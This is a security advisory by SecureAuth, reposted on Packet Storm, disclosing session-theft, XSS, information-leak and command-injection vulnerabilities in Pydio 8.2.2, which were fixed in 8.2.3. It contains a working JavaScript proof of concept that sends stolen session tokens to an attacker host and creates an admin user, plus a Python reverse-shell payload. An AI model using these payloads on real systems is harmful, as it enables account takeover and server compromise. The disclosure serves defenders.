Lucene search

K
packetstormLeandro CuozzoPACKETSTORM:152292
HistoryMar 29, 2019 - 12:00 a.m.

Pydio 8 Command Execution / Cross Site Scripting

2019-03-2900:00:00
Leandro Cuozzo
packetstormsecurity.com
107

0.001 Low

EPSS

Percentile

48.8%

`SecureAuth - SecureAuth Labs Advisory  
http://www.secureauth.com/  
  
Pydio 8 Multiple Vulnerabilities  
  
1. *Advisory Information*  
  
Title: Pydio 8 Multiple Vulnerabilities  
Advisory ID: SAUTH-2019-0002  
Advisory URL:  
https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities  
Date published: 2019-03-28  
Date of last update: 2019-03-28  
Vendors contacted: Pydio  
Release mode: Coordinated release  
  
2. *Vulnerability Information*  
  
Class: Argument Injection or Modification [CWE-88], Argument Injection  
or Modification [CWE-88], Information Exposure [CWE-200], Improper  
Neutralization of Input During Web Page Generation  
('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200],  
Information Exposure [CWE-200]  
Impact: Code execution, Security bypass, Information leak  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,  
CVE-2019-10046, CVE-2019-10046  
  
3. *Vulnerability Description*  
Pydio [1] website states that:  
...Pydio, an open source EFSS (Enterprise File Synchronization and  
Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud  
environment. Pydio is available either through a Community distribution  
(Ideal for home use) that is free forever or an Enterprise which  
provides all the features, support and compliance to secure file sharing.  
Pydio is sold in more than 25 countries, from Cupertino to Singapore,  
and is used by leading brands around the world, such as Nikon, Credit  
Agricole, Dexia... Pydio also serves education and government clients,  
with major references such as Cambridge University (UK) and ADEME  
(France).  
  
Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2),  
which allows an attacker with regular user access to the application and  
by tricking an administrator account to open a shared URL bookmark  
through the application, to obtain the victim's session identifiers in  
order to impersonate him/her and to perform actions such as create a new  
user administrator account. After gaining privileged access to the  
application the attacker can leverage another vulnerability to perform  
OS command injection under the privileges of the user account running  
the web server.  
  
4. *Vulnerable Packages*  
  
. Pydio 8.2.2 - Latest version at the time of testing.  
. Older versions are probably affected too, but they were not checked.  
  
5. *Vendor Information, Solutions and Workarounds*  
  
Pydio published v8.2.3 that fixes all the reported vulnerabilities.  
  
6. *Credits*  
  
These vulnerabilities were discovered and researched by Ramiro Molina  
from SecureAuth Security Consulting Services. The publication of this  
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories  
Team.  
  
7. *Technical Description / Proof of Concept Code*  
  
7.1. *Privilege escalation vector based in multiple vulnerabilities*  
  
[CVE-2019-10049]  
By chaining vulnerabilities it is possible for an attacker with regular  
user access to the web application to attempt to trick an administrator  
user to open a link shared through the application, that in turn opens a  
shared file that contains JavaScript code that is executed in the  
context of the victim user to obtain sensitive information such as  
session identifiers (session cookie and secure token) and perform  
actions on behalf of him/her.  
  
Note: if the targeted users are not administrators, any other action on  
behalf of that user could also be achieved, to for example obtain  
sensitive files stored in their accounts or impersonate them.  
  
Attack vector steps:  
  
1. Authenticated in the web application with a regular user account, go  
to "My Files" and upload a file named for example pydio_xss.html (use  
the .html extension) with the following content. The PoC once executed  
performs several requests to:  
  
. Obtain a "secure_token" for the user, which is a CSRF prevention token.  
. Obtain the session cookie for the current user.  
. Send the two sensitive tokens to the attacker, this allows to  
impersonate the victim user.  
. Change the "context to configuration".  
. Create a new user account named "admin99" with password "password1".  
. Change the user role of the created user to administrator.  
  
Note: change the IP address and port number (the example ones are the  
IP 192.168.56.1 and port 9999).  
  
PoC pydio_xss.html file:  
  
/-----  
<html>  
<body>  
<script type="text/javascript">  
console.log("Starting...");  
var req0 = new XMLHttpRequest();  
req0.open('GET', "/welcome/", true);  
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
req0.send();  
req0.onload = function() {  
var res = req0.responseText.match(/SECURE_TOKEN.*?,/)[0];  
var secure_token = res.split(/"/)[2] ;  
var req1 = new XMLHttpRequest();  
req1.open('POST', "index.php", true);  
req1.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
req1.send("get_action=get_sess_id&secure_token=" + secure_token);  
req1.onload = function() {  
var session_cookie = req1.responseText;  
var req2 = new XMLHttpRequest();  
req2.open('POST', "http://192.168.56.1:9999/creds", true);  
req2.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
req2.send("Session Cookie: " + session_cookie + "; secure_token: "  
+ secure_token);  
req2.onload = function() {  
console.log("I just sent your protected session cookie.");  
};  
//switch "repository" to configuration  
var req3 = new XMLHttpRequest();  
req3.open('POST', "/index.php", true);  
req3.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
  
req3.send("get_action=switch_repository&repository_id=ajxp_conf&secure_token="  
+ secure_token);  
req3.onload = function() {  
console.log("Creating a new admin user...");  
var req4 = new XMLHttpRequest();  
req4.open('POST', "/index.php", true);  
req4.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
  
req4.send("get_action=create_user&new_user_login=admin99&new_user_pwd=password1&group_path=&secure_token="  
+ secure_token);  
req4.onload = function() {  
console.log(req4.responseText);  
console.log("Promoting user to admin...");  
var req5 = new XMLHttpRequest();  
req5.open('POST', "/index.php", true);  
req5.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
  
req5.send("get_action=edit&sub_action=post_json_role&role_id=AJXP_USR_%2Fadmin99&json_data=%7B%22ROLE%22%3A%7B%22ACL%22%3A%7B%7D%2C%22MASKS%22%3A%7B%7D%2C%22ACTIONS%22%3A%7B%7D%2C%22PARAMETERS%22%3A%7B%7D%2C%22APPLIES%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D%2C%22METADATA%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D&secure_token="  
+ secure_token);  
req5.onload = function() {  
console.log(req5.responseText);  
};  
};  
};  
};  
};  
</script>  
</body>  
</html>  
-----/  
  
2. Still in "My Files" create a new URL bookmark with the following URL  
and a label of your choice. Note that selecting a good label can help  
into tricking an administrator user into opening the bookmark. The URL  
must reference the filename uploaded in the previous step. For this  
example, the file is named '"pydio_xss.html"':  
  
/-----  
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fpydio_xss.html  
-----/  
  
3. Select each the uploaded HTML file and share it with the administrator  
user account by clicking on share and in the popup, window select the  
target user (or users if the administrator account is not known) and  
click on save.  
  
4. Do the same with the URL Bookmark and share it with the victim  
administrator user/s.  
  
5. On a command prompt with for example ncat set a listener for the  
incoming post request with the session identifiers.  
  
6. Once the administrator opens the URL Bookmark the JavaScript code in  
the uploaded file will be executed, the session identifiers will be  
posted to the attacker's machine and a new administrator user (named  
"admin99" with password "password1") will be created.  
  
7. The attacker can login with the created administrator user or can  
leverage the session identifiers to impersonate the victim user.  
  
Note: after gaining access as an administrator to the web application an  
attacker can leverage the OS command injection vulnerability described  
in this advisory to run system commands on the underling operative  
system with the local user running the web server.  
  
7.2. *OS command injection by parameter abuse in ImageMagick plugin*  
  
[CVE-2019-10048]  
The 'ImageMagick' plugin that is installed by default in Pydio 8.2.2  
does not perform the appropriate validation and sanitization of user  
supplied input in the plugin's configuration options allowing arbitrary  
shell commands to be entered that result in command execution on the  
underlying operative system with the privileges of the local user  
running the web server. The attacker will need to be authenticated into  
the application with an administrator user account in order to be able  
to edit the affected plugin configuration. In this advisory a privilege  
escalation vector by levering other vulnerabilities from a regular user  
standpoint is also described.  
  
Proof of Concept:  
  
1. Logged in with an administrator account into the web application,  
go to Settings -> Editors.  
  
2. Disable the PDF Viewer plugin.  
  
3. Enable the ImageMagick plugin.  
  
4. Click on Edit ImageMagick plugin settings.  
  
5. In the popup window, add at the end of the current settings for the  
"Thumbs options" and "Images options" parameters the following example  
payload to run a python reverse shell (where in the example the IP  
address is 192.168.56.1 and the port number is 9999, edit accordingly)  
and save the settings. An example payload is:  
  
/-----  
; python -c 'import  
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",9999));os.dup2(s.fileno(),0);  
os.dup2(s.fileno(),1);  
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';  
-----/  
  
6. On a command prompt with for example ncat set a listener for the  
incoming reverse shell.  
  
7. With the administrator account, or any other account upload a test  
PDF file to a workspace and observe that a reverse shell is received.  
  
Affected source code:  
  
The affected source code section is located in the file:  
'"plugins/editor.imagick/IMagickPreviewer.php" line #380'. The following  
code section is where the vulnerability is located. Note that the user  
provided parameters are not validated and sanitized before construction  
the "$cmd" string an being passed to the exec() function.  
  
/-----  
$customOptions = $this->getContextualOption($ctx, "IM_CUSTOM_OPTIONS");  
$customEnvPath = $this->getContextualOption($ctx, "ADDITIONAL_ENV_PATH");  
$viewerQuality = $this->getContextualOption($ctx, "IM_VIEWER_QUALITY");  
$thumbQuality = $this->getContextualOption($ctx, "IM_THUMB_QUALITY");  
if (empty($customOptions)) {  
$customOptions = "";  
}  
if (!empty($customEnvPath)) {  
putenv("PATH=".getenv("PATH").":".$customEnvPath);  
}  
$params = $customOptions." ".( $this->extractAll? $viewerQuality :  
$thumbQuality );  
$cmd = $this->getContextualOption($ctx, "IMAGE_MAGICK_CONVERT")."  
".$params." ".escapeshellarg(($masterFile).$pageLimit)."  
".escapeshellarg($tmpFileThumb);  
$this->logDebug("IMagick Command : $cmd");  
session_write_close(); // Be sure to give the hand back  
exec($cmd, $out, $return);  
-----/  
  
7.3. *Current user AjaXplorer session cookie value disclosure*  
  
[CVE-2019-10045]  
The 'AjaXplorer' session cookie is correctly set with the 'HTTPOnly'  
flag to prevent access to its value from scripts. The affected "action"  
'get_sess_id' discloses the session cookie value in the response body  
enabling scripts to get access to its value. This identifier can be  
reused by an attacker to impersonate a user and perform actions on  
behalf of him/her if the session is still active.  
  
Proof of Concept:  
  
The response to the following HTTP POST request with the parameter  
'get_action=get_sess_id' returns the current user session identifier  
('AjaXplorer' session cookie value) in the response.  
  
Request:  
  
/-----  
POST /index.php? HTTP/1.1  
Host: 192.168.56.101  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.56.101/ws-inbox/  
content-type: application/x-www-form-urlencoded; charset=UTF-8  
origin: http://192.168.56.101  
Content-Length: 68  
Connection: close  
Cookie: AjaXplorer=1ln7fa60h1ajsapm7ha45sge26; ajxp_licheck=ok  
  
get_action=get_sess_id&secure_token=zZ6lpJaRUovEYm0imb839L8YhWI1UHZK  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:21:18 GMT  
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 26  
  
1ln7fa60h1ajsapm7ha45sge26  
-----/  
  
7.4. *Stored Cross-site scripting (XSS) in file view feature*  
  
[CVE-2019-10047]  
A stored cross-site scripting vulnerability exists in the affected web  
application that can be exploited by levering the file upload and file  
preview features of the application. An authenticated attacker can  
upload an HTML file containing Javascript code and afterword's a file  
preview URL can be used to access the uploaded file.  
If a malicious user shares an uploaded HTML file containing JavaScript  
code with another user of the application and tricks an authenticated  
victim into accessing an URL (i.e. by clicking in a link) that results  
in the HTML code being interpreted by the web browser and the included  
JavaScript code being executed under the context of the victim user  
session.  
  
Proof of Concept:  
  
With an authenticated user go to "My Files" and upload a HTML file as  
the following PoC, which is named for example "xss.html":  
  
/-----  
<html>  
<body>  
<script type="text/javascript">  
alert("SecureAuth");  
</script>  
</body>  
</html>  
-----/  
  
In another tab of the web browser access the following URL, and notice  
that the JavaScript code is executed, and a popup alert is displayed:  
  
/-----  
http://192.168.56.102/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html  
-----/  
  
Request:  
  
/-----  
GET  
/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html  
HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: AjaXplorer=gdn92c6maohf28lt2noiso1891; ajxp_licheck=ok  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:00:21 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: public  
Pragma: no-cache  
Content-Disposition: inline; filename="xss.html"  
Content-Length: 66  
Connection: close  
Content-Type: text/html; charset=us-ascii; name="xss.html"  
  
<html>  
<body>  
<script>alert("SecureAuth")</script>  
</body>  
</html>  
-----/  
  
Share the file with an administrator user, and logged in with that user  
account access the "Shared Files" repository and in another tab, access  
following URL and notice that the JavaScript code is also executed:  
  
/-----  
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html  
-----/  
  
Request:  
  
/-----  
GET /index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html  
HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: AjaXplorer=6vh2o75udh253f6lu8p99cpmr5; ajxp_licheck=ok  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:01:05 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: public  
Pragma: no-cache  
Content-Disposition: inline; filename="xss.html"  
Content-Length: 66  
Connection: close  
Content-Type: text/html; charset=us-ascii; name="xss.html"  
  
<html>  
<body>  
<script>alert("SecureAuth")</script>  
</body>  
</html>  
-----/  
  
7.5. *Unauthenticated Pydio and PHP libraries versions information  
disclosure*  
  
[CVE-2019-10046]  
An unauthenticated attacker can obtain information about the Pydio  
version and PHP libraries and their versions by performing a HTTP POST  
request to '/index.php' and including the parameters  
'"get_action=display_doc& doc_file=CREDITS"' in the body.  
  
Proof of Concept:  
  
Request:  
  
/-----  
POST /index.php? HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.56.102/welcome/  
content-type: application/x-www-form-urlencoded; charset=UTF-8  
origin: http://192.168.56.102  
Content-Length: 53  
Connection: close  
Cookie: AjaXplorer=a; ajxp_licheck=ok  
  
get_action=display_doc&doc_file=CREDITS&secure_token=  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:26:49 GMT  
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 9246  
  
<img src="plugins/gui.ajax/PydioLogo250.png"/>  
<br><div style="padding-left:10px;"><div  
style="font-size:0.8em;">Version 8.2.2 - 2018-10-10  
<br>Copyright 2007-2017 Abstrium SAS  
<br>The latest code can be found at https://pydio.com/.  
<br></div>  
...  
TRUNCATED  
...  
<br>  
<br><div class="title">PHP Libraries</div>  
<br>  
<br> aws/aws-sdk-php 3.19.18 Apache-2.0  
<br> commerceguys/guzzle-oauth2-plugin v2.1.1 MIT  
<br> dapphp/securimage 3.6.4 BSD  
<br> davegardnerisme/nsqphp dev-master 60f12ad none  
<br> evenement/evenement v2.0.0 MIT  
<br> firebase/php-jwt v2.2.0 BSD-3-Clause  
<br> gimler/guzzle-description-loader v0.0.4 MIT  
<br> guzzlehttp/command 0.7.1 MIT  
<br> guzzlehttp/guzzle 5.3.1 MIT  
<br> guzzlehttp/guzzle-services 0.5.0 MIT  
<br> guzzlehttp/promises 1.2.0 MIT  
<br> guzzlehttp/psr7 1.3.1 MIT  
<br> guzzlehttp/ringphp 1.1.0 MIT  
<br> guzzlehttp/streams 3.0.0 MIT  
<br> meenie/javascript-packer 1.1 LGPL 2.1  
<br> mtdowling/jmespath.php 2.3.0 MIT  
<br> nikic/fast-route v1.0.1 BSD-3-Clause  
<br> phpseclib/phpseclib 2.0.3 MIT  
<br> psr/http-message 1.0.1 MIT  
<br> psr/log 1.0.2 MIT  
<br> react/cache v0.4.1 MIT  
<br> react/child-process v0.4.1 MIT  
<br> react/dns v0.4.3 MIT  
<br> react/event-loop v0.4.2 MIT  
<br> react/http v0.4.1 MIT  
<br> react/http-client v0.4.13 MIT  
<br> react/promise v2.4.1 MIT  
<br> react/react v0.4.2 MIT  
<br> react/socket v0.4.3 MIT  
<br> react/socket-client v0.4.5 MIT  
<br> react/stream v0.4.4 MIT  
<br> sabre/dav 1.8.10 BSD-3-Clause  
<br> sabre/vobject 2.1.7 BSD-3-Clause  
<br> symfony/config v3.1.5 MIT  
<br> symfony/console v3.1.5 MIT  
<br> symfony/debug v3.1.5 MIT  
<br> symfony/filesystem v3.1.5 MIT  
<br> symfony/polyfill-mbstring v1.2.0 MIT  
<br> symfony/yaml v3.1.5 MIT  
<br> zendframework/zend-diactoros 1.3.7 BSD-2-Clause  
<br>  
<br>  
<br><div class="title">Other Plugins</div>  
<br> PThumb.php <a target="_blank"  
href="http://www.phpclasses.org">http://www.phpclasses.org</a> (LPGL)  
<br> OpenLayers <a target="_blank"  
href="http://www.openlayers.org">http://www.openlayers.org</a> (BSD)  
<br> Video-js <a target="_blank"  
href="http://www.videojs.com/">http://www.videojs.com/</a> (LGPL)  
<br> Zend Lucene <a target="_blank"  
href="http://www.zend.com/">http://www.zend.com/</a> (New BSD)  
<br> SoundManager : <a target="_blank"  
href="http://www.schillmania.com/projects/soundmanager2/">http://www.schillmania.com/projects/soundmanager2/</a>  
(BSD)  
<br> CAS Driver (Apache 2): https://github.com/Jasig/phpCAS  
<br>  
<br></div>  
-----/  
  
7.6. *Unauthenticated Pydio "Boot Config" information disclosure*  
  
[CVE-2019-10046]  
An unauthenticated attacker can obtain information about the Pydio  
configuration including session timeout and license information by  
performing a HTTP GET request to '"/index.php?get_action=get_boot_conf"'.  
  
Proof of Concept:  
  
Request:  
  
/-----  
GET /index.php?get_action=get_boot_conf HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:42:53 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;  
Max-Age=0  
Connection: close  
Content-Type: application/json  
Content-Length: 136855  
{  
"ajxpResourcesFolder": "plugins/gui.ajax/res",  
"ajxpServerAccess": "index.php",  
"zipEnabled": true,  
"multipleFilesDownloadEnabled": true,  
"customWording": {  
"welcomeMessage": "My Company File Sharing Platform",  
"title": "Pydio Enterprise",  
"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",  
"iconWidth": "250px",  
"iconHeight": "120px",  
"iconOnly": true,  
"titleFontSize": ""  
},  
"usersEnabled": true,  
"loggedUser": false,  
"currentLanguage": "en",  
"session_timeou Date: Wed, 30 Jan 2019 22:42:53 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;  
Max-Age=0  
Connection: close  
Content-Type: application/json  
Content-Length: 136855  
{  
"ajxpResourcesFolder": "plugins/gui.ajax/res",  
"ajxpServerAccess": "index.php",  
"zipEnabled": true,  
"multipleFilesDownloadEnabled": true,  
"customWording": {  
"welcomeMessage": "My Company File Sharing Platform",  
"title": "Pydio Enterprise",  
"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",  
"iconWidth": "250px",  
"iconHeight": "120px",  
"iconOnly": true,  
"titleFontSize": ""  
},  
"usersEnabled": true,  
"loggedUser": false,  
"currentLanguage": "en",  
"session_timeout": 1440,  
"client_timeout": 1440,  
"client_timeout_warning": 3,  
  
...  
TRUNCATED  
...  
  
"helper_booster.updater.force.2": "force reinstall",  
"helper_booster.updater.force.3": "?"  
},  
"SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",  
"streaming_supported": "true",  
"theme": "material",  
"ajxpImagesCommon": true,  
"licence_features": [  
"TRIAL",  
"footer",  
"splash",  
"customCopyright:<a href='https://pydio.com'>Pydio Enterprise  
Distribution</a> - Trial version valid until 2019-02-20."  
]  
}t": 1440,  
"client_timeout": 1440,  
"client_timeout_warning": 3,  
  
...  
TRUNCATED  
...  
  
"helper_booster.updater.force.2": "force reinstall",  
"helper_booster.updater.force.3": "?"  
},  
"SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",  
"streaming_supported": "true",  
"theme": "material",  
"ajxpImagesCommon": true,  
"licence_features": [  
"TRIAL",  
"footer",  
"splash",  
"customCopyright:<a href='https://pydio.com'>Pydio Enterprise  
Distribution</a> - Trial version valid until 2019-02-20."  
]  
}  
-----/  
  
8. *Report Timeline*  
2019-02-11: SecureAuth sent an initial notification to Pydio including  
a draft advisory.  
2019-02-11: Pydio confirmed the reception of the advisory.  
2019-02-15: Pydio informed they were testing the vulnerabilities and  
they will answer back next week.  
2019-02-15: SecureAuth thanked the update.  
2019-02-20: Pydio requested a clarification about some vulnerabilities.  
2019-02-21: SecureAuth sent additional information to Pydio.  
2019-03-08: SecureAuth requested an update.  
2019-03-08: Pydio replied saying they were planning to release their  
fix next week and asked. SecureAuth to test this new version.  
2019-03-08: SecureAuth thanked the update and agreed to test the new  
version.  
2019-03-12: Pydio sent the fixed version.  
2019-03-15: Pydio asked for an update and proposed to release its fix on  
Tuesday 19th.  
2019-03-15: SecureAuth informed Pydio that the fixed version was tested  
and all the reported vulnerabilities were addressed. In addition,  
SecureAuth proposed to postpone the release date to Thursday 21th.  
2019-03-18: Pydio thanked the answer and agreed on the proposal.  
2019-03-21: Pydio released the version 8.2.3  
2019-03-28: Advisory SAUTH-2019-0002 published.  
  
9. *References*  
  
[1] https://pydio.com/en/about-us  
  
10. *About SecureAuth Labs*  
  
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct research in several important areas of  
computer security, including identity-related attacks, system  
vulnerabilities and cyber-attack planning. Research includes problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. We regularly publish security  
advisories, primary research, technical publications, research blogs,  
project information, and shared software tools for public use at  
http://www.secureauth.com.  
  
11. *About SecureAuth*  
  
SecureAuth is leveraged by leading companies, their employees, their  
customers and their partners to eliminate identity-related breaches. As  
a leader in access management, SecureAuth is powering an identity  
security revolution by enabling people and devices to intelligently and  
adaptively access systems and data, while effectively keeping bad actors  
from doing harm. By ensuring the continuous assessment of risk and  
enablement of trust, SecureAuth's highly flexible platform makes it  
easier for organizations to prevent the misuse of credentials. To learn  
more, visit www.secureauth.com, call (949) 777-6959, or email us at  
[email protected]  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2019 SecureAuth, and are  
licensed under a Creative Commons Attribution Non-Commercial Share-Alike  
3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
`

0.001 Low

EPSS

Percentile

48.8%

Related for PACKETSTORM:152292